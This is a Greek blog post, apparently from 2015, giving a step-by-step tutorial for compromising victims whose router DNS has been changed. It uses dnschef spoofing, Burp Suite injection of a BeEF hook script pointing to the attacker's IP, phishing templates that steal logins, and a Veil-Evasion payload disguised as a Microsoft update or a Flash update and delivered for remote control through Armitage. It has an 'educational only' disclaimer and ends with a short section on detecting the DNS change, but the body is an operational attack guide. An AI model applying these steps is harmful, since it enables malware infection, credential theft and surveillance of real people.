ΠΡΟΣΟΧΗ

Προσοχή! Οι οδηγοί μου είναι μόνο για εκπαιδευτικούς σκοπούς,
εφαρμόζοντας τους κακόβουλα σε τρίτους είναι με δικιά σας ευθύνη καθώς ορισμένοι απο αυτούς είναι παράνομοι

Τετάρτη 7 Ιανουαρίου 2015

Πως εισβαλουμε σε συνδεσεις και υπολογιστες


Τι θα χρειαστειτε;

 1.Kali linux
2.Ψευτικη σελιδα (Microsoft)

Το Α και το Ω σε αυτη την επιθεση ειναι να εχουμε αλλαξει το DNS (resolver) στο router του θυματος
Σε παλιοτερους οδηγους θα δειτε πως εισβαλουμε σε ενα απομακρυσμενο router η πως μολυνουμε εναν υπολογιστη και μεσω αυτου εισβαλουμε στο router του 
 
Τωρα πριν αρχισουμε την επιθεση πρεπει να κανουμε τις απαραιτητες ρυθμισεις στο δικο μας router

Ο ποιο ευκολος τροπος ειναι να επιλεξουμε την επιλογη DMZ
η να προωθησουμε αυτες τις θυρες
53 για dns resolver
888 για τον ιο (armitage)
80 και 443 για http και https
3000 για το BeEF

οποτε κανουμε login στο ρουτερ μας απλα γραφωντας στην url http://192.168.1.1 η 192.168.2.1 η 192.168.1.254
βαζουμε τους κωδικους πχ admin  admin αναλογα τι router εχετε
πηγαινουμε στο Firewall και επιλεγουμε DMZ

πχ στο δικο μου ρουτερ ειναι ετσι


οποτε τωρα γραφουμε curl ifconfig.me


και βλεπετε την εξωτερικη μας ip (public ip)

οποτε τωρα πριν επιτεθουμε φτιαχνουμε τον ιο με το Veil-Evasion
(πως θα το κανετε εγκατασταση και να δημιουργησετε τον ιο κοιταξτε σε παλιοτερο οδηγο)

εδω στο Veil βλεπουμε τι πρεπει να βαλουμε δλδ την εξωτερικη μας ip και την θυρα που θελουμε εσεις μπορειτε να βαλετε οποια θυρα θελετε


γραφουμε generate για να μας φτιαξει τον ιο και εδω βαζουμε το ονομα που θελουμε να εχει το αρχειο εσεις βαλτε αυτο ΚΒ925256


παταμε enter και εχουμε δημιουργησει επιτυχως τον ιο


ο ιος ειναι στο φακελο /root/veil-output/compiled/KB925256.exe

τωρα πρεπει να κατεβασουμε την ψευτικη σελιδα αναβαθμισης πατηστε εδω

οταν κατεβει το αρχειο fake.zip το μετακινουμε στο /var/www/ με την εντολη

mv /root/Downloads/fake.zip /var/www
η mv /root/fake.zip /var/www αναλογα που το εχετε κατεβασει το αρχειο

μετα πηγαινουμε με την εντολη cd /var/www

και αποσυμπιεζουμε το αρχειο με την εντολη

unzip fake.zip


τελος γραφουμε nano index.html παταμε ctrl+w γραφουμε στην αναζητηση public-ip παταμε  enter ωστε να μας παει εκει

πχ
αλλαζουμε το public-ip με την εξωτερικη μας ip
πχ

τωρα παταμε ctrl+x παταμε y και enter ωστε να αποθηκευσουμε την αλλαγη
και μετακινουμε τον ιο με την εντολη
mv /root/veil-output/compiled/KB925256.exe /var/www

τωρα ειμαστε ετοιμοι να ξεκινησουμε την επιθεση

οποτε ξεκιναμε το burpsuite γραφοντας σε ενα τερματικο burpsuite
οταν ανοιξει πηγαινουμε στην καρτελα Proxy και options

 επιλεγουμε Αdd βαζουμε την θυρα 443, All interfaces


στην καρτελα  Request handling επιλεγουμε Support invisible proxying


επιλεγουμε ok και απο κατω yes


κανουμε το ιδιο πραγμα και για την θυρα 80

οποτε οταν τελειωσετε οι ρυθμισεις θα ειναι ετσι

βγαζουμε  την επιλογη απο  127.0.0.1:8080 δλδ


πηγαινουμε κατω κατω μεχρι να βρουμε Match and Replace

επιλεγουμε Add και βαζουμε τις κατω ρυθμισεις
* στο Replace βαζουμε αυτο
<script type=text/javascript src=http://public-ip:3000/hook.js></script>
οπου public-ip βαζετε την εξωτερικη σας ip

επιλεγουμε ok και εχουμε αυτες τις ρυθμισεις

πηγαινουμε ακριβως απο κατω στο SSL Pass Through και επιλεγουμε Add

επιλεγουμε απλα οκ

τελος επιλεγουμε στην καρτελα Proxy - Intercept (Intercept off)


ανοιγουμε ενα αλλο τερματικο και γραφουμε

 dnschef -i 192.168.1.64 --fakeip=188.x.xx.xx4 --truedomains=*google.gr

οπου -i ειναι η εσωτερικη μας ip (για να την βρειτε γραψτε σε ενα τερματικο ifconfig)
--fakeip=βαζουμε την εξωτερικη μας ip
--truedomains=βαζουμε *google.gr

Τωρα αλλαζουμε το DNS στο router του θυματος και βαζουμε την εξωτερικη μας ip σαν Primary DNS και Secondary DNS βαζουμε 8.8.8.8(δειτε παλιοτερους οδηγους πως) 

τωρα τι εχουμε κανει μεχρι στιγμης;

αλλαζωντας τον DNS στο router του θυματος και βαζοντας την ip μας επιτρεπουμε στο dnschef να κανει  το resolve δλδ με απλα λογια οταν καποιος ψαχνει για το www.facebook.com το dnschef σαν DNS resolver θα λεει οτι το facebook ειναι στην δικια μας την ip και οχι στην πραγματικη ip που ειναι το facebook...απο εκει και περα  οτι σελιδα και να ζητησει το θυμα  το dnschef θα του λεει παντα την δικια μας την ip (εκτος απο την google.gr που βαλαμε να ειναι σαν truedomain).Eδω σε αυτο το σημειο αναλαμβανει το burpsuite σαν μεσολαβητης(proxy) και ανακατευθυνει την συνδεση του θυματος κανονικα δλδ απο το θυμα προς την ιστοσελιδα και απο την ιστοσελιδα προς το θυμα ομως στις σελιδες http την συνδεση απο την ιστοσελιδα προς το θυμα θα αλλαζει  τον κωδικα της σελιδας βαζωντας ενα javascript το οποιο ειναι το hook του BeEF αλλα στην  συνδεση με  ιστοσελιδες https απο το θυμα προς την ιστοσελιδα αλλα και αντιστροφα δεν θα κανει τιποτα εφοσον εχουμε επιλεξει την επιλογη SSL Pass Through και απλα θα ειναι ενας απλος μεσολαβητης

....συνεχιζουμε

σε ενα τερματικο γραφουμε beef-xss και μας ανοιγει το BeEF στον περιηγητη μας
τα κριτηρια συνδεσης ειναι beef και beef


και περιμενουμε να μας εμφανιστει καποιο zombie (χρηστης)


αν κοιταξουμε το dnschef θα δουμε τα dns resolves πχ για το www.zoo.gr
οτι ανακατευθυνετε στην ip μου


και βλεπουμε στο BeEF το zombie


στο θυμα δεν θα φαινεται τιποτα αλλα αν δειτε τον κωδικα της σελιδας θα δειτε οτι το το burpsuite εβαλε το hook(javascript) του BeEF

 
 τωρα μπορουμε να κλεψουμε κωδικους με το prety thieft ,να μολυνουμε το θυμα με τον ιο μας και οτι πληκτρολογει το θυμα θα μπορουμε να του δουμε στα logs του BeEF
γενικα με το BeEF μπορειτε να κανετε παρα πολλα πραγματα

ας πουμε οτι θελουμε να κλεψουμε τον κωδικο του θυματος απο το zoo
το pretty thieft εχει ετοιμα templates για να κλεβετε κωδικους
 οπως facebook ,youtube,Linkedin,windows,yammer
και generic (το οποιο μπορειτε να βαλετε εσεις οτι εικονα θελετε)
εμεις επιλεγουμε το generic
εκει που λεει custom logo ψαχνουμε στο διαδικτυο για εικονα του www.zoo.gr  κανουμε αντιγραφη της τοποθεσιας της εικονας
πχ βαζουμε http://www.selida.com/eikona.png και επιλεγουμε Execute


 στο θυμα θα του εμφανιστει αυτο


και οταν βαλει τα στοιχεια του θα τα παρουμε (δειτε δεξια)


τωρα για να μολυνουμε το θυμα με τον ιο μας μπορουμε να το κανουμε με 2 τροπους η με το BeEF η με την ψευτικη σελιδα

Ανοιγουμε το armitage και το βαζουμε να ακουει στη θυρα 888  (δειτε παλιοτερους οδηγους πως)


Τωρα με το BeEF

Παταμε εδω φτιαχνουμε ενα λογαριασμο και ανεβαζουμε τον ιο μας
μετα επιλεγουμε share


αλλαζουμε το 0 στο τελος με 1 και κανουμε αντιγραφη του συνδεσμου

 δλδ θα ειναι https://www.dropbox.com/blabla/ios.exe?dl=1

τωρα πηγαινουμε στο BeEF και επιλεγουμε  Fake Flash Update
δεξια που λεει image κανουμε αντικατασταση μονο τα 0.0.0.0 με την εξωτερικη μας ip
στο Custom Payload URL βαζουμε τον συνδεσμο απο το dropbox και παταμε Execute


στο θυμα μας θα του εμφανιστει αυτο


Αλλος τροπος Lcamtuf Download


στο θυμα θα ανοιξει σε μια αλλη καρτελα την σελιδα του Adobe Flash Player
αλλα θα του βγαλει να κατεβασει τον ιο απο το dropbox


Αλλος τροπος με Clippy δειτε εικονα κατω


 Αλλος τροπος με Fake Notification Bar δειτε εικονα κατω



Τωρα οταν το θυμα κατεβασει και τρεξει τον ιο μας θα δειτε μια συνεδρια στο armitage


Για να δειτε οτι αλλη μια ιδιοτητα του ΒeEF στην κατω εικονα το θυμα γραφει στην σελιδα stardoll τα κρητηρια συνδεσης του


 αν παμε στα logs θα δουμε τα κρητηρια του θυματος δλδ ονομα koulara και κωδικος larakoula


Τωρα ο αλλος τροπος για να μολυνουμε το θυμα μας με τον ιο ειναι με την ψευτικη σελιδα της Microsoft

 πηγαινουμε στο Burpsuite και βγαζουμε το interface της θυρας 80


ανοιγουμε ενα τερματικο και γραφουμε

service apache2 start

ωστε να ξεκινησουμε το apache (web server)

τωρα οταν το θυμα κανει περιηγηση στο διαδικτυο και ψαχνει πχ μια ιστοσελιδα
το dnschef θα λεει οτι αυτη η σελιδα ειμαστε εμεις,ομως μια ιστοσελιδα https(443) θα προωθειτε κανονικα στο προορισμο της και παλι πισω στο θυμα μεσω του burpsuite χωρις να πειραζει κατι (θυμηθειτε την επιλογη SSL pass through) ενω οτι ιστοσελιδα http(80)  ψαχνει θα του εμφανιζει την σελιδα που εμεις φιλοξενουμε δλδ την ψευτικη σελιδα της Microsoft


αν πατησει download και τρεξει τον ιο μας θα τον δουμε στο armitage

Τωρα απο εκει και περα πως θα κανετε persist(μονιμο) τον ιο σας στο  θυμα μπορειτε να κοιταξετε παλιοτερους οδηγους μου

*Πρεπει να γνωριζετε οτι με αυτο τον τροπο της ψευτικης σελιδας ,ολες οι συσκευες θα κατευθυνονται σε αυτη την σελιδα ακομα κινητα και tablets τα οποια ακομα και τον ιο να κατεβασουνε δεν μπορουνε να τον τρεξουνε και θα κινησετε υποψιες.*

*ΠΡΟΣΟΧΗ σχεδον σε ολα τα router εχει Primary DNS και Secondary DNS εσεις θα βαλετε Primary την δικια σας εξωτερικη ip και Secondary θα βαλετε 8.8.8.8 που ειναι της Google DNS resolver
και το κανουμε αυτο γιατι αν δεν ειστε εσεις online τοτε το θυμα θα μπορει να χρησιμοποιησει της Google αλλιως δεν θα μπορει να κανει resolve ιστοσελιδες
με αποτελεσμα να κανει reset το router του και να χασετε οποια απομακρυσμενη προσβαση εχετε στο router.


Πως θα καταλαβετε αν σας εχουνε αλλαξει το DNS;

Απο τα windows απλα ανοιξτε το cmd (MS-DOS)

και γραψτε nslookup localhost

στην κατω εικονα βλεπουμε οτι ολα ειναι ενταξει γιατι απο κατω απο το Name localhost εχει την ip 127.0.0.1 που ετσι πρεπει να ειναι

εδω βλεπετε οτι λεει μια εξωτερικη ip ενω θα επρεπε να εχει την ip 127.0.0.1


βεβαια στο πανω παραδειγμα εχει γινει αλλαγει του  DNS στον υπολογιστη

αν εχει γινει αλλαγει στο router τοτε θα σας εμφανισει την πρωτη εικονα και δεν θα καταλαβετε κατι

για να το τσεκαρετε απλα γραψτε nslookup localhost:80

Αν ανακαλυψετε οτι καποιος πεζει με την συνδεση σας τοτε πρεπει να βρειτε πως αποκτησε προσβαση
Κοιταξτε για ιο ,αλλαξτε τον κωδικο συνδεσης στο router και κωδικο του ασυρματου σας
Αναρτήθηκε από στις
Ετικέτες , , , ,

Δεν υπάρχουν σχόλια:

Δημοσίευση σχολίου

Εγγραφή σε: Σχόλια ανάρτησης (Atom)